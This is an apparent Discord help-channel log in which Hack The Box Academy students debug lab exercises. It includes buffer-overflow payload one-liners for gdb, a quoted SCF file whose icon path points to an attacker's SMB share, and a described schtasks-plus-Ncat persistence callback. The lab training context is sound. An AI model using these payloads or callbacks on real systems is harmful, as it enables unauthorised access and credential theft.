Hello, I'm stuck on this part. Buffer overflow in the Linux room. The total area is 1040 bytes and accordingly I allocate 150 bytes for shellcode, 100 bytes for NOPs and 4 bytes for EIP, and I initialize gdb accordingly, but the EIP value falls to the 0x444444444444 address; why, when it should fall to 0x66666666? Academy does the same but theirs is correct and mine is wrong.
*0x44444444
addresses won't always line up
I'll send a support ticket later, tried it again and it didn't work
The address does not need to be the same, I am setting the offset here.
that sucks, hopefully they can fix it soon
could someone lend me a quick hand, I'm currently on the easy Footprinting lab and I am trying to "get id_rsa" for the ssh key, but I am getting a permission denied error
check if you have write permissions in the directory you are trying to save the file
I didn't even know that was a thing that could block me. Thank you!
is there ever a way to designate the directory you want to copy the file to from the ftp server?
get <filename on server> /path/to/save/locally (if you want to keep the filename you just end the path with / so /path/to/save/locally/)
I'm just relieved that I possibly couldn't be that stupid. Man I literally ping swept & scanned & tried to enumerate 5 different servers, found a WordPress site, and I don't know what more until I decided fk it and brought out my toolkit I always have with me in CTFs
thank you! that helps a ton
as calc said you really shouldn't have found anything else besides what was expected on the server
That's exactly my thought too, and that's why I went here about it; it couldn't possibly have needed to take that long
just spawned a fresh machine, and the interesting credential password worked just fine
(xfreerdp)
When I come back home I'll try with a different VPN
remmina works as well
just to be sure you were trying the : ad* account yes?
but yeah the creds i discovered after the initial enumeration via a credentialed account work just fine for the intended user
yeah dumping NTDS is way out of scope for this module
Can anyone help me?
instead run $(python3 -c "print('\x55' * (1040-4-150-100) + '\x90' * 50 + '\x44' * 150 + '\x66' * 4)") But 786+50+150+150+4 = 990, 50 missing in between. I'm about to go crazy right now, help me
thx I succeeded, I hadn't activated the notification
Ah yeah you gotta do the test notification
The problem is python3. When printing "\x90" you'll end up with "\xc2\x90" instead.
python3 -c "print('\x55' * (1040-4-150-100) + '\x90' * 50 + '\x44' * 150 + '\x66' * 4)" | hexdump -C
00000000 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 |UUUUUUUUUUUUUUUU|
*
00000310 55 55 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 |UU..............|
00000320 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 c2 90 |................|
*
00000370 c2 90 c2 90 c2 90 44 44 44 44 44 44 44 44 44 44 |......DDDDDDDDDD|
00000380 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 |DDDDDDDDDDDDDDDD|
*
00000400 44 44 44 44 44 44 44 44 44 44 44 44 66 66 66 66 |DDDDDDDDDDDDffff|
00000410 0a |.|
00000411
Either use pwntools to generate the payload or use something like this
python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (1040-4-150-100) + b'\x90' * 50 + b'\x44' * 150 + b'\x66' * 4)" | hexdump -C
00000000 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 |UUUUUUUUUUUUUUUU|
*
00000310 55 55 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |UU..............|
00000320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000340 90 90 90 90 44 44 44 44 44 44 44 44 44 44 44 44 |....DDDDDDDDDDDD|
00000350 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 |DDDDDDDDDDDDDDDD|
*
000003d0 44 44 44 44 44 44 44 44 44 44 66 66 66 66 |DDDDDDDDDDffff|
000003de
can you not prefix the '\x00' with b instead of importing sys? or does it not work that way
No, does not work like that. You'll end up with even more garbage.
python3 -c "print(b'\x90')" | hexdump -C
00000000 62 27 5c 78 39 30 27 0a |b'\x90'.|
00000008
I don't fully understand what you said, I'm new to binary exploitation. Can you tell me what to write to gdb @bright coral
Will the problem be solved if I use python2?
as python2 didn't work either
run $(python -c "import sys; sys.stdout.write('\x55' * (1040 - 100 - 150 - 4) + '\x90' * 100 + '\x44' * 150 + '\x66' * 4)")
python2 is deprecated
and in most distros has officially been dropped from repos
This is not mix-and-match
Either you use python2.7 and "print('\x55' * (1040-4-150-100) + '\x90' * 50 + '\x44' * 150 + '\x66' * 4)"
or
Python3 and "import sys; sys.stdout.buffer.write(b'\x55' * (1040-4-150-100) + b'\x90' * 50 + b'\x44' * 150 + b'\x66' * 4)" (there are bs missing as prefix for \x55 in the version you used)
I don't understand a word you're saying. What am I supposed to do? @bright coral
dude
he's giving you the explicit python3 command
also in most cases python is just symlinked to python3
¯\_(ツ)_/¯
(gdb) run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (1040 - 100 - 150 - 4) + b'\x90' * 100 + b'\x44' * 150 + b'\x66' * 4)")
0x66666666 in ?? ()
It worked, thank you very much. I tired you a little @bright coral @fathom pendant
i used to work helpdesk
the amount of stupid i've endured far outweighs your fair question
okay I need help with Windows Privilege Escalation [Interacting with Users], we have to do some SCF
i am lost as i dont understand the module information
In this example, let's create the following file and name it something like @Inventory.scf (similar to another file in the directory, so it does not appear out of place). We put an @ at the start of the file name to appear at the top of the directory to ensure it is seen and executed by Windows Explorer as soon as the user accesses the share. Here we put in our tun0 IP address and any fake share name and .ico file name.
Interacting with Users
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
is the shell and commands inside the file?
Feck off, I didn't invite you to dm me
get muted idiot
682548
Thanks, I'll try later π
Hi
sorry, new with ffuf: does this response mean nothing was gathered, or are the results saved on the other side?
Has anyone had problems with the Introduction to Windows Evasion Techniques module!?
For some reason in the Static Analysis section, even after having a successfully tested reverse shell binary on the DEV host, the automation script didn't create a flag, even after confirming it wasn't detected in the logs.
Now the same in the Dynamic Analysis. Executed the same steps as in the Section, tested on DEV, got a callback, the file does not get picked by Defender as it states in the log file, but it just times out after it being executed
(cannot confirm it's executed due to low level permissions and cannot debug the automation script)
@golden horizon please do not post spoilers / answers to modules / sections over Tier 0 here.
Even recorded a screen capture
Instead, ask a question that someone can respond to you either in DM or here without providing a spoiler in turn
this is a common thing with ffuf not in full screen
??
ffuf likes to constantly show new lines with progress if your terminal isn't full screen for whatever reason
so i should run it again on full screen?
yeah
ok ty master
don't
Hey for this question ==> Attack the Splunk target and gain remote code execution. Submit the contents of the flag.txt file in the c:\loot directory.
i didn't get reverse shell
how to resolve it?
make sure your payload has your tun0 IP in it
it also helps if you provide the module and section name
also make sure your job names are labeled properly before compressing it back into the zip
i.e. run.ps1; not rev.ps1
the only reason I know what module you're talking about is bc i only just did this the other day
i got it thanks for ur support!!!!
guys, for this website https://dehashed.com/api mentioned in this section https://academy.hackthebox.com/module/113/section/1214, do you have to pay? In the section he doesn't pay for the API, or rather it uses no API
Have you been compromised? DeHashed provides free deep-web scans and protection against credential leaks. A modern personal asset search engine created for security analysts, journalists, security companies, and everyday people to help secure accounts and provide insight on compromised assets. Free breach alerts & breach notifications.
You don't need to use dehashed
The example output can be useful though
okok thx
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (1040 - 256 - 4) + b'\x01\x02\x03\x04\x05\x06\x07....SNIP....\xfa\xfb\xfc\xfd\xfe\xff' + b'\x66' * 4)")
x/2000xb $esp+500
When I examine the bad characters I see that they all exist, I wonder where I am going wrong
@bright coral Dude, are you here?
Well if that's lifted from the example
No, I shortened my own code so that it doesn't take up the page.
run $(python -c 'print "\x55" * (1040 - 254 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')
This example in the module is already not working, I need to edit it, but when I edit it, I could not detect any bad characters.
Hi I'm struggling on the skills assessment for the pivot module. I've managed to use the foothold webshell to upload ligolong and find a target (target1) behind the foothold. Then I found two more targets behind target1. So setup a double pivot using ligolong to those targets and that all works fine.
I'm stuck on getting a shell on the two targets behind target1
I have the credentials I found on the foothold which I used to login to target1
I also found another user and I think a network share
I tried reusing creds for the 2 targets behind target1
Thought I'd ask here b4 moving in to exploit searching
There's only one target accessible per hop
Make sure you aren't being silly and accidentally looking at that same host's ip 
There's no need for exploit searching from what I recall
Ok thx
Definitely two targets behind the second hop
I did find a host with rdp service behind second host. And tried various credentials.... that's as far as I got
i got q1, 2, 3, 4 and 5
5 was a bit of a guess. I didn't actually validate what the user was vulnerable to
thank u
That comforts me a little
The last 2 questions will be achievable from that last point
got it
Aka the next host you hop to is the end of the road
thanks, perhaps i should have took a step back and thought about all the things i've learnt
thanks for the hint, I think I should be able to get there now
awesome..!!
thank you for this, I spent about an hour on this question alone
Sessions Module
CSRF Session ID stealing
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.14.251 - - [20/Aug/2024 21:40:59] "GET /csrf.html HTTP/1.1" 200 -
10.10.14.251 - - [20/Aug/2024 21:41:51] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:42:39] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:48:22] "GET /csrf0.html HTTP/1.1" 200 -
10.10.14.251 - - [20/Aug/2024 21:57:22] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:57:46] "GET /csrf0.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:59:08] "GET /csrf0.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:59:35] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 22:02:32] "GET /csrf0.html HTTP/1.1" 304 -
Why is there 304 status codes? And even when there is a 200 status code and the CSRF is successfully requested, it still doesnt change my profile details. Whats wrong with this?
Hey. I'm having trouble with finding the flag through mongo. The shell returns nothing when I use `db.flag.find().pretty()`
What academy module is this from?
And what section
If it's a starting point machine, read and follow #welcome --> #starting-point
Ty. It's a starting point machine.
I figured
was anyone able to get Rogue Potato working on Module Windows Privilege Escalation -> SeImpersonate and SeAssignPrimaryToken . No matter what I try I keep getting Connection refused or Connection Reset on my socat listener
I used printspoofer
yeah same i got that one to work. was just trying to practice all 3 techniques but i'm starting to think that maybe Rogue Potato isn't possible. wanted to see if someone was able to get it to work at all
you need to use a suitable clsid
okay yeah i didn't try using the non-default clsid so i'll try that next. thanks
Let's see. What module was I on
Yeah I've heard the hardest part about boiling the potatoes is the right clsid
afaik it's a guessing game
There's some logic
hi
Recursively fuzz the "recursive_fuzz" path on the target system (ie http://IP:PORT/recursive_fuzz/) to find the flag. I can't get the answer
paaain
Well did you recursively fuzz the directory given on the spawned ip/port?
Don't use the recursion limit
Yes, I've been here for more than an hour without any results.
Shouldn't take an hour
Reset the target
Also make sure you use the right list, iirc the medium list is whats shown
I didn't solve the lab , but maybe you should dig deeper more depth
Short answer if you can enum HKLM:\ you can find clsids
good to know
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://94.237.49.212:48712/recursive_fuzz/level1/level2/level3/FUZZ -e .html,.php,.phps -c -ic -t 200 -recursion -recursion-depth 2 -rate 500
is the command i am using now but i have no results
Take off the recursion depth
You could also be overloading the server with threads
Drop to 100
Also as an FYI you don't need to do :FUZZ after your wordlist, it's assumed
Only when you use multiple wordlists do you need to specify
ok
kinda interesting. Juicy Potato works on this box but Rogue Potato doesn't, and the exploits use the same CLSID by default
so i dunno. the module doesn't really talk about how to enumerate CLSIDs so i think it might be out of scope for CPTS which is what I care about.
yeah, I usually use printspoofer but knowing that there are other tools that can do the same job can be helpful sometimes
yeah for sure. i appreciate you reaching out with ideas
if anyone else goes through chat history 5 years from now and can get Rogue Potato to work on the Windows Privilege Escalation -> SeImpersonate and SeAssignPrimaryToken module exercise, feel free to DM me about whatever it is that I'm not understanding
The command is invalid
Especially in "-p" flags
I used volatility3
Been trying to search the function, specific code, etc . But no results
Because k8s are a pain and to widely deploy I'm sure would suck
Well the -p is the pid no?
The valid one is --pid
Hi in the Documentation & Reporting Practice Lab. Should I be able to scan the subnet 172.16.5.0/24? I ran a masscan of all ports in that subnet and get 0 results. I've restarted the box am I missing something?
You'd have to be inside the internal network to scan it
I scanned from the Parrot Box
yes
The 10.129.x.x machine
yes
If you do ip a that should be it's ip, alongside another ip that would allow you to see the internal network
If you see a public ip and 10.10.x.x that's not the target
(Covering my bases here)
I see 172.16.5.225/23 along side the target ip
is there a support channel or do I @ something?
Green bubble on academy website
Need to speak to a person? Learn how to reach our support via HTB Labs.
I solved the question.
Annoying thing is you shouldn't enter the ps1 extension
A doubt about this command ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v This command will execute for the temporary variable FUZZ the commands from the specified wordlist, both as they are and with the added .php?(because the -e .php) So, will two lists be iterated?
I know recursively but that's my main question
Yes 2 lists are iterated
Also generally don't limit recursion unless you absolutely have to
Technically they're run in parallel bc threads.
thank you
A great example of a use for schtasks would be providing us with a callback every time the host boots up. This would ensure that if our shell dies, we will get a callback from the host the next time a reboot occurs, making it likely that we will only lose access to the host for a short time if something happens or the host is shut down. We can create or modify a new task by adding a new trigger and action. In our task above, we have schtasks execute Ncat locally, which we placed in the user's AppData directory, and connect to the host `172.16.1.100` on port `8100`. If successfully executed, this connection request should connect to our command and control framework (Metasploit, Empire, etc.) and give us shell access.
Introduction to windows command line, Working with scheduled tasks
Can you not
I'm just curious, so the attacker used a scheduled task (on startup) to use a program local to the target (Ncat), to connect to the attacker
I'm not an on-call support
you arent? 
No

- I'm not paid to
- if I was it's nearly 1 am
apologies
if anyone is still having issues with this, I thought there were 2 RDP tools on Kali so googled "xfreerdp vs"... didn't get the results I expected BUT as I'm going through the Active Directory Enumeration & Attacks module atm I recall a tool called Remmina. Downloaded it, tried it and it worked almost immediately, so worth a try
(Sidenote I'm not paid at all
I don't work for htb, I just volunteer my time)
ill do the same once i have some more knowledge under my belt
thanks for all the help thus far
It's not an issue btw
All you need to do is press enter
As I have told people ad nauseum
It's a failure to draw the corporate/enterprise AUP screen
Don't know why it happens, it does
But to answer this question, yes
A script is run on startup that sends the connection to the attacker
thats really awesome
when searching 'rdp black screen' there are three answers, none of yours, and I just tried again. I had to hit enter over 5 times but yes, got there in the end, but sure, I apologise for trying to have input and be part of the community. I'll go back to my corner and shut my mouth now I suppose
If you had to hit it 5x to get it to register, then it's also more likely your connection
But xfreerdp does have this known thing to happen.
Try just black screen, and click on some and scroll down/around for context
I am BIG stuck on this module Passwd, Shadow & Opasswd. I ssh with Will and password, but he doesn't have sudo privileges, so i can't cp the shadow file so i can unshadow them, i need a hint.
But for future people the rdp xfreerdp blackscreen issue is simply solved by pressing enter. It's a failure to draw the AUP enterprise screen that you have to click ok on to go to the login/desktop. If clicking enter doesn't work, the enter button is roughly left-center on the lower third of the screen
You don't need sudo privs
The backups were stored somewhere will can see
the backups of the shadow file?
Yes
:)
Idk if there's anything to be gained from his history I don't think I checked when I did this
interesting, i guess i will hunt the file system, hopefully it stands out to me
Don't forget to list all
Wow, I would have never found this without a hint. Thank you
Remember sometimes there may be hidden files the -a arg in ls shows all files
I almost gave up and went to bed, only to find at the last second that i got the answer and did not realize it was saved to the file i designated. Hashcat did not tell me that i cracked the password, but i had the answer in the file
i am so relieved
Got stuck in linux privilege escalation in the logrotate task. Does anyone have a hint or something?
Leave the question at that I think; anything else could be considered a spoiler, which are not allowed for modules over Tier 0. Someone may get in touch with a nudge
Is it possible to send me in chat?
Set-DomainUserPassword : The term 'Set-DomainUserPassword' is not recognized as the name of a cmdlet, function, script
file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct
and try again
can someone tell me why this error prompts? I am using PowerView.ps1 to change a password
i believe that command is AD, did you import-module activedirectory
nvm i'm thinking set-ADAccountPassword apparently
but my question still remains did you import powerview.ps1?
i did
Hello, how are you? I hope you are all well. My name is Amjad from Egypt, and I want to enter and excel in the field of cybersecurity. I have a background in the subject, but I want to learn properly. I want to learn correctly. I do not want to take courses from which I will not benefit anything. I want to discover my first loophole and start in the field of cybersecurity and excel like the people who excel every day on the Hackerwan website and the rest of the sites. Do you understand what I mean? I want someone with knowledge to guide me to the right path, no matter how long it takes. The important thing is to learn correctly. Thank you to everyone who will answer me on how to learn cybersecurity in a correct and systematic manner
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
does anyone have a problem with kerbrute output? when i use it to enum users, it generates an empty text file, even though it has found users
i want to ask one question in Password Attacks - Pass the Ticket (PtT) from Linux here is the question Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Here i get the NTLM hash of the LNUX01$
but its not working can anyone give me a little hint?
Someone may come to give you a nudge, but please avoid posting content that may contain spoilers or information that could be used to spoil the exercise. Thanks
Sorry my bad!
No worries
you mean you can't crack the hash, or use the hash ?
i cant crack the hash
which wordlist did you use ?
normal rockyou
as I just built another VM so SecLists is not there
it should work :(, you can send me the command in dm if you want
sure
i dont think but i am not getting any idea
what did you use to get the hash in the first place
/etc/krb5.keytab
/etc/krb5.conf
what's another type of file that can also be used as a ticket ?
yeah, but there's also c .. ?
if you're not sure, try to reread the content ! you should find your answer there !
crontab
not exactly, crontab can't be used as a ticket
it can help you get a ticket on specific condition, but can't be used as
yess i know, but it can't be used as a ticket
you have another file in the system that can be used as a ticket
you have keytab, .kt file, and also another!
once you found out which file type it is, just try to search for it with a find command, and it should be obvious !
ccache
look up how kerberos works
you're not supposed to crack it
Got it thankss
ya missing kinit
if you're using kali, all the kerberos stuff should be preinstalled
doing ssh with -p 2222
google pass the ticket and scan the target for ports you can use to get a shell
?? Pass the ticket in linux not windows
" Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." You're connecting to a domain controller I believe, no?
ya i got it
linux does not have native kerberos authentication
Yup
